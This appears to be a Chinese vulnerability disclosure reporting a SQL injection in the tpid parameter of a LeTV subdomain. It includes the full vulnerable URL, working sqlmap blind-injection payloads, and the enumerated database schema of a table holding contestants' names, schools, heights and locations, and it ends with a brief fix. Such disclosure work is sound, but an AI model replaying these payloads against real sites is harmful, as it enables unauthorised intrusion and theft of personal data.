乐视网某分站SQL注射漏洞下载

乐视网某分站SQL注入漏洞

http://plx.hz.letv.com/

乐视网: 盘龙峡漂流FUN享赛

http://plx.hz.letv.com/php/plxtpadd.php?callback=jQuery1710625948480097577_1400496281923&tpid=5&_=1400496312754

tpid参数存在注入

 

---

Place: GET

Parameter: tpid

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: callback=jQuery1710625948480097577_1400496281923&tpid=5' AND 1182=1

182 AND 'qaNf'='qaNf&_=1400496312754



    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: callback=jQuery1710625948480097577_1400496281923&tpid=5' AND SLEEP(

5) AND 'Ooib'='Ooib&_=1400496312754

---

[18:54:51] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.19

back-end DBMS: MySQL 5.0.11

available databases [2]:

[*] information_schema

[*] plx

Database: plx

[2 tables]

+---------+

| tp_ip   |

| tp_mein |

+---------+

Database: plx

Table: tp_mein

[11 columns]

+--------+--------------+

| Column | Type         |

+--------+--------------+

| age    | varchar(20)  |

| cont   | varchar(500) |

| height | varchar(20)  |

| id     | int(20)      |

| jig    | varchar(50)  |

| name   | varchar(20)  |

| num    | int(20)      |

| pic1   | varchar(100) |

| pic2   | varchar(100) |

| school | varchar(100) |

| tpid   | varchar(20)  |

+--------+--------------+

name对应妹子姓名，school：妹子所在学院，height：妹子身高，jig：妹子所在地..

其他就不看了..


 

修复方案：

过滤参数